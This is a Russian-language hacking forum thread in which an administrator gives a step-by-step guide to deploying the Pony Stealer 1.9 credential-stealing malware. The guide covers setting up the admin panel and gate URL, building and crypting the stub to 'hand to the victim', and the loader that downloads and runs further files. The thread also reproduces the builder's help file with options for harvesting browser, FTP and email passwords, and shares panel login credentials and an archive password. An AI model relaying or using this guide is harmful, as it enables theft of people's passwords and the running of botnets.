Pony Stealer 1.9

Тема в разделе "Трояны и шпионские программы", создана пользователем Антоха, 16 апр 2014.

↑ ↓
  1. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:

    Если судит по многочиленныым отзывам, то это один из лучших стилеров.Решил проверить, а заодно и написать пошаговый мануальчик по его использованию (хотя всё предельно ясно, если вы уже пользовались подобным софтом).
    FAR Manager
    * Total Commander
    * WS_FTP
    * CuteFTP
    * FlashFXP
    * FileZilla
    * FTP Commander
    * BulletProof FTP
    * SmartFTP
    * TurboFTP
    * FFFTP
    * CoffeeCup FTP
    * CoreFTP
    * FTP Explorer
    * Frigate3 FTP
    * SecureFX
    * UltraFXP
    * FTPRush
    * WebSitePublisher
    * BitKinex
    * ExpanDrive
    * ClassicFTP
    * Fling
    * SoftX
    * Directory Opus
    * FreeFTP
    * DirectFTP (определяется как FreeFTP)
    * LeapFTP
    * WinSCP
    * 32bit FTP
    * NetDrive
    * WebDrive
    * FTP Control
    * Opera
    * WiseFTP
    * FTP Voyager
    * Firefox
    * FireFTP
    * SeaMonkey
    * Flock
    * Mozilla Suite Browser
    * LeechFTP
    * Odin Secure FTP Expert
    * WinFTP
    * FTP Surfer
    * FTPGetter
    * ALFTP
    * Internet Explorer
    * Dreamweaver
    * DeluxeFTP
    * Google Chrome
    * Chromium
    * SRWare Iron (определяется как Chromium)
    * ChromePlus
    * Bromium (Yandex Chrome)
    * Nichrome
    * Comodo Dragon
    * RockMelt
    * K-Meleon
    * Epic
    * Staff-FTP
    * AceFTP
    * Global Downloader
    * FreshFTP
    * BlazeFTP
    * NETFile
    * GoFTP
    * 3D-FTP
    * Easy FTP
    * Xftp
    * FTP Now
    * Robo-FTP
    * LinasFTP
    * Cyberduck
    * Putty
    * Notepad++ (NppFTP)
    * CoffeeCup Visual Site Designer
    * CoffeeCup Sitemapper (определяется как CoffeeCup FTP)
    * FTPShell
    * FTPInfo
    * NexusFile
    * FastStone Browser
    * CoolNovo
    * WinZip
    * Yandex.Internet
    * MyFTP
    * sherrod FTP
    * NovaFTP
    * Windows Mail
    * Windows Live Mail
    * Pocomail
    * Becky!
    * IncrediMail
    * The Bat!
    * Outlook
    * Thunderbird
    * FastTrackFTP
    1.Зарегистрируем аккаунт, например на hostinger.ru (если честно дерьмовый хостинг, но для ерунды пойдёт). Там сейчас интерфейс поменяли, добавили какие-то фичи ... и теперь на хак форумах продают новые дырки в хостингере)
    Закажите Наши Бесплатные Услуги - Mozilla Firefox.
    2.Создадим БД (базу данных).
    Базы Данных MySQL - Google Chrome.

    3.Загрузим файлы из папки "Panel",которая находится в архиве с программой,на наш хостинг.
    u16165143831.170.164.69 - FileZilla.
    5.Изменим содержание файла config.php, внеся данные нашей БД.
    CUsersuserAppDataLocalTempfz3temp-1config.php - Notepad++.


    6.Теперь перейдём по адресу http://вашхост.ру/setup.php (в моём случае http://ponystealer.hol.es/setup.php),где увидим окошко установщика.Придумаем и введём логин и пароль для нашей админки.
    [Tutorial] Setup Pony 1.9 Stealer {Updated} +DOWNLOAD - Mozilla Firefox.


    7.Жмём "Установить" и видим надпись о том, что установка завершена и мы можем перейти в панель администрирования.
    ponystealer.hol.essetup.php - Google Chrome.
    8.Переходим на вкладку "Управление", выбираем пункт"Параметры сервера"
    и придумываем пароль для того, чтобы мы могли в дальнейшем расшифровать отчёты (которые Пони шифрует). Всё с виртуальной частью мы закончили.
    Pony - Admin panel - Google Chroume.


    9.Переходим в папку с нашим билдером и запускаем PonyBuilder.exe
    windows 8 (Виндовс 8.1) [Работает] - Oracle VM VirtualBox.


    10.Во вкладке "Builder" прописываем путь до гейта http://вашхост.ру/gate.php (в моём случае http://ponystealer.hol.es/gate.php)
    windows 8 (Виндовс 8.1) [Работает] - Oracleап VM VirtualBox.
    11.Вкладка "Loader", тоесть загрузчик файлов.После сбора паролей с указанных линков (URL) будут загружены и запущены файлы.
    windows 8 (Виндовс 8.1) [Работает] - Oracle VM VirtкауualBox.
     
    • Мне нравится Мне нравится x 6
  2. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    12.Вкладка "Settings",обязательно установить тот же пароль на дешифровку отчётов (см.пункт 8).По другим параметрам на этой вкладке,я думаю понятно,если не совсем,то вся информация есть в файле help.txt в папке с программой.(Последняя вкладка изменить скин)
    windows 8 (Виндовс 8.1) [Работает] - Oracle VM VirсаыаtualBox.
    13.Возвращаемся на вкладку "Builder" где мы можем выбрать иконку для нашего билда стилера и создать его,нажав на кнопку "Create Stub"
    windows 8 (Виндовс 8.1) [Работает] - Oracle VкакуM VirtualBox.
    14.Вот и всё.Теперь осталось только закриптовать наш новоявленный файл и вручить его жертве.Да и ещё на папку temp ставим права 777.


    ВАЖНО!ПРОЧИТАЙТЕ HELP.TXT НЕКОТОРЫЕ МОМЕНТЫ ТАМ ОПИСАНЫ БОЛЕЕ ПОДРОБНО!(например варианты сборки билда стилера:в виде экзешника или в виде ddl-файла)
    Отчёты с найденными на компе жертвы паролями вы найдёте на вкладке Reports (в админке).
    Pony - Admin panel - Google Cпваhrome.
    Удачного стилинга!

    ###########################################
    #Leaked for TrojanForge.com
    ###########################################


    -=- Система сбора FTP паролей "Pony" -=-

    Билдер "PonyBuilder.exe"
    ========================

    Задача билдера - настроить и скомпилировать клиент "Pony.exe", который необходимо прогружать на зараженные компьютеры.

    Комплект поставки:

    * Папка "masm32" - компилятор Microsoft Macro Assembler (MASM).
    * Папка "PonySrc" - исходный код на языке MASM программы-клиента (граббера) "Pony.exe".
    * Папка "BuilderSrc" - исходный код на языке Delphi 7 вспомогательной программы-билдера "PonyBuilder.exe".
    * Файл "PonyBuilder.exe" - программа-билдер для клиента "Pony.exe".
    * Файл "Help.txt" - файл помощи.
    * Файл "build.bat" - скрипт используемый билдером для компиляции билда из исходников "PonySrc".
    * Файл "Pony.ico" - иконка прикрепляемая к "Pony.exe" при компиляции, если в билдере выбрана соответсвующая опция.

    Интерфейс разделен на 4 закладки:

    1. Билдер
    Текстовое поле "Список URL для отправки паролей" - здесь можно прописать список URL гейтов для отправки паролей.
    Каждая строка - отдельный URL, к примеру: http://somedomain.com/dir/gate.php
    Можно добавить неограниченное количество строк (URL), один и тот же URL можно добавить несколько раз.
    Домен может содержать информацию о порте подключения, к примеру: http://privatedomain.com:8080/gate.php
    Протокол https:// на данный момент не поддерживается.
    "Pony.exe" будет пытаться подключиться и отправить отчет с паролями по списку, если данные будет успешно доставлены,
    программа немедленно завершит работу без попыток подключения к остальным URL.

    Кнопка "Выбрать иконку" позволяет установить иконку для компилируемого файла, поддерживается только формат *.ico.
    Кнопка "Создать билд" компилирует файл "Pony.exe" с заданными настройками.

    2. Лоадер
    Простой лоадер (загрузчик файлов). После сбора паролей с указанных линков (URL) будут загружены и запущены файлы.
    URL задаются таким же образом, как и список доменов для отправки паролей.
    В нижней части закладки можно задать следующие опции:
    * Активировать лоадер - включить работу лоадера, иначе файлы загружаться не будут.
    * Не запускать одинаковые файлы дважды - после успешного запуска скачанного файла в реестр будет добавлено контрольное значение
    (хеш) данных файла, после чего, при повторной загрузке, дубликат запущен не будет.

    3. Настройки
    Для того, чтобы увидеть все настройки, нужно активировать опцию "Показать продвинутые настройки" в главном меню.
    * Сжимать - сжимать отчеты с помощью библиотеки aPLib, прибавляет около 5Кб к размеру исполняемого файла,
    хорошо пакует текстовые данные перед отправкой, настоятельно рекомендуется использовать, сильно снижает трафик
    к серверу.
    * Шифровать - шифровать отчеты алгоритмом RC4.
    * Пароль шифрования - пароль, которым шифруются отчеты, аналогичный пароль необходимо установить в настройках сервера.
    * Сохранять отчеты на диск (для отладки) - при запуске "Pony.exe", после того как были собраны пароли, в той же папке
    где был запущен исполняемый файл, будет создан файл "out.bin", это контейнер с паролями в таком виде, в каком он отправляется
    на сервер для последующей обработки (дешифровки).
    * Отсылать пустые отчеты (для статистики) - обычно, если ни одного пароля не найдено, клиент "Pony.exe" ничего отправлять
    серверу не будет, но иногда полезно включение данной опции для получения статистики о количестве успешных запусков "Pony.exe".
    * Режим отладки - снимает перехватчик исключений, убирает код затрудняющий отладку и дизассемблирование программы, использовать исключительно в целях отладки.
    * Отсылать только новые отчеты - если опция не активирована, тогда дублирующие отчеты с паролями отправляться не будут.
    * Самоудаление - запущенный файл "Pony.exe" будет удален после того как завершит свою работу.
    * Добавить иконку - прикрепить выбранную иконку к компилируемому файлу.
    * Паковать билд с помощью UPX - сжать исполняемый файл "Pony.exe" после компиляции.
    * Количество попыток отправить отчет - сколько раз пытаться отправить отчет при неуспешной передаче, рекомендуется указать минимум 2 попытки
    * Вариант сборки:
    * Exe-файл - обычный исполняемый файл Windows (*.exe)
    * Dll-файл - вариант сборки в виде .dll библиотеки, она абсолютно автономна, для отработки необходимо вызвать из вашего проекта лишь API-функцию LoadLibrary(), т.е. URL для отправки паролей
    и все настройки вшиваются в сам .dll файл. В папке DllTest лежит простой пример использования-тестирования, в эту же папку необходимо положить файл Pony.dll, после чего запустить файл DllTest.exe,
    который в свою очередь вызывает LoadLibrary() для .dll библиотеки.

    В списке "Доступные модули дешифровки" можно исключить из билда ненужные дешифровщики паролей, это уменьшит размер билда.

    4. Скин
    На этой закладке можно выбрать понравившийся скин (шкурку) билдера.

    Запуск билдера с командной строки
    =================================

    Доступны следующие аргументы командной строки билдера:
    -PACK_REPORT - сжимать отчеты
    -ENCRYPT_REPORT - шифровать отчеты, если пароль шифрования не задан, то по умолчанию будет указан "Mesoamerica"
    -REPORT_PASSWORD= - пароль шифрования, к примеру: -REPORT_PASSWORD=Mesoamerica
    -SAVE_REPORT - сохранять отчеты на диск (для отладки)
    -ENABLE_DEBUG_MODE - режим отладки
    -SEND_MODIFIED_ONLY - отсылать только новые отчеты
    -SELF_DELETE - активировать самоудаление
    -SEND_EMPTY_REPORTS - отсылать пустые отчеты
    -ADD_ICON - прикрепить иконку из файла Pony.ico
    -UPX - паковать билд с помощью UPX
    -DOMAIN_LIST= - список доменов, каждый домен должен быть разделен с помощью спец. символа \n, к примеру: -DOMAIN_LIST=http://host.com/gate.php\nhttp://host2.com/x/gate.php
    -LOADER_LIST= - список URL для лоадера (будет активирован автоматически при наличии URL), каждый URL должен быть разделен аналогично DOMAIN_LIST
    -LOADER_EXECUTE_NEW_FILES_ONLY - не запускать одинаковые файлы дважды
    -DISABLE_MODULE= - исключить из билда определенный модуль дешифровки (все названия модулей можно увидеть в файле PonySrc\FTPClients.asm), к примеру: -DISABLE_MODULE=MODULE_OPERA
    -DLL_MODE - использовать вариант сборки в виде Dll-библиотеки
    -COLLECT_HTTP - дополнительно собирать и HTTP/HTTPS пароли
    -COLLECT_EMAIL - дополнительно собирать и E-mail пароли (POP3, IMAP, SMTP)
    -UPLOAD_RETRIES=N - количество (N) попыток отправить отчет, если значение не указано, то по умолчанию используются 2 попытки

    Клиент "Pony.exe"
    =================

    Задача "Pony.exe" - собрать пароли с компьютера и отправить их на сервер для последующей обработки.

    Работает на всех NT версиях Windows, начиная с Win98, включая серверные. Поддерживается работа в режиме x86 и x64.
    Программа нормально отрабатывает при запуске с правами администратора или пользователя.

    Перед распространением файл желательно почистить и криптануть.

    Реализована мгновенная дешифровка сохраненных паролей для следующих программ:
    * FAR Manager
    * Total Commander
    * WS_FTP
    * CuteFTP
    * FlashFXP
    * FileZilla
    * FTP Commander
    * BulletProof FTP
    * SmartFTP
    * TurboFTP
    * FFFTP
    * CoffeeCup FTP
    * CoreFTP
    * FTP Explorer
    * Frigate3 FTP
    * SecureFX
    * UltraFXP
    * FTPRush
    * WebSitePublisher
    * BitKinex
    * ExpanDrive
    * ClassicFTP
    * Fling
    * SoftX
    * Directory Opus
    * FreeFTP
    * DirectFTP (определяется как FreeFTP)
    * LeapFTP
    * WinSCP
    * 32bit FTP
    * NetDrive
    * WebDrive
    * FTP Control
    * Opera
    * WiseFTP
    * FTP Voyager
    * Firefox
    * FireFTP
    * SeaMonkey
    * Flock
    * Mozilla Suite Browser
    * LeechFTP
    * Odin Secure FTP Expert
    * WinFTP
    * FTP Surfer
    * FTPGetter
    * ALFTP
    * Internet Explorer
    * Dreamweaver
    * DeluxeFTP
    * Google Chrome
    * Chromium
    * SRWare Iron (определяется как Chromium)
    * ChromePlus
    * Bromium (Yandex Chrome)
    * Nichrome
    * Comodo Dragon
    * RockMelt
    * K-Meleon
    * Epic
    * Staff-FTP
    * AceFTP
    * Global Downloader
    * FreshFTP
    * BlazeFTP
    * NETFile
    * GoFTP
    * 3D-FTP
    * Easy FTP
    * Xftp
    * FTP Now
    * Robo-FTP
    * LinasFTP
    * Cyberduck
    * Putty
    * Notepad++ (NppFTP)
    * CoffeeCup Visual Site Designer
    * CoffeeCup Sitemapper (определяется как CoffeeCup FTP)
    * FTPShell
    * FTPInfo
    * NexusFile
    * FastStone Browser
    * CoolNovo
    * WinZip
    * Yandex.Internet
    * MyFTP
    * sherrod FTP
    * NovaFTP
    * Windows Mail
    * Windows Live Mail
    * Pocomail
    * Becky!
    * IncrediMail
    * The Bat!
    * Outlook
    * Thunderbird
    * FastTrackFTP

    Данные для доступа к админке экспериментальной Пони(обновлённые,так как той админке писец):
    http://loshadka.esy.es/admin.php
    Имя пользователя:Loshadka
    Пароль:91@5yU$^dKMwug1

    Пасс на архив:111
     

    Вложения:

    • Pony 1.9.rar
      Размер файла
      5,6 МБ
      Просмотров:
      55
    • Мне нравится Мне нравится x 7
  3. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Сейчас попробовал на виртуальной восьмёрке.Сохранил пароль в IE,в последней версии Хрома,последней версии фаерфокса,в Filezilla.Пароли успешно пришли только с Хрома и Filezilla.Из старой версии IE пароль приходит.

    Pony - Admin panel - Mozilla Firefox.
     
    • Мне нравится Мне нравится x 7
  4. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Статья четырёхмесячной давности с xakep.ru....

    Утечка исходного кода ботнета Pony привела к появлению множества форков
    В последнее время средства массовой информации активно обсуждают находку SpiderLabs — базу данных с паролями, которую собрали владельцы одного из форков ботнета Pony. На голландском сервере нашли около 2 млн паролей от Facebook, Yahoo, Google Account, «Вконтакте» и «Одноклассников».
    [​IMG]
    [​IMG]
    Специалисты SpiderLabs объясняют, что находка этого небольшого ботнета стала возможной благодаря тому, что в последнее время появилось много форков Pony 1.9 — и, соответственно, немало таких индивидуальных ботнетов. Распространение форков началось после того, как случилась утечка кода программы управления ботнетом Pony.
    В коде можно найти единственный комментарий на русском языке.
    Код:
    date_default_timezone_set('Europe/Moscow');
     
    (
    привет москва!)
    Несмотря на привет Москве, специалисты сомневаются, что код написан русскими. Возможно, это иностранный разработчик написал заказ для российского клиента и вставил комментарий кириллицей, чтобы тому было приятно.
     
    • Мне нравится Мне нравится x 5
  5. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Еще-бы вирустотал билда был бы очень кстати, или хотя-бы пара слов как на поняшу реагируют антивири :D
     
  6. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Вообще-то все отчёты приложены.Естественно он палится практически всеми антивирями.Советую заюзать этот стилер (Black Stealer).Простой и работает вроде неплохо.
     
    • Мне нравится Мне нравится x 3
  7. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Надо попробовать будет)
     
  8. Zema Пользователь
    Zema
    Ответить в чате

    Первый уровень

    Регистрация:
    06.07.2014
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    не хрена не понял как его установить, все вроде правильно, а логи не шлет(( печаль беда
     
  9. -NegaTiv- Пользователь
    -NegaTiv-
    Ответить в чате

    Первый уровень

    Регистрация:
    22.07.2014
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    А что за ошибка?

    "gmp" extension installed - FAIL!
     
  10. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    Хайд - Это такой интересный предмет, он вроде есть и его сразу нет и никто не поймёт в чём секрет...Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 4
Похожие темы:
  1. X-Shar
    Ответов:
    22
    Просмотров:
    6.070
  2. Антоха
    Ответов:
    16
    Просмотров:
    5.621
Загрузка...

Поделиться этой страницей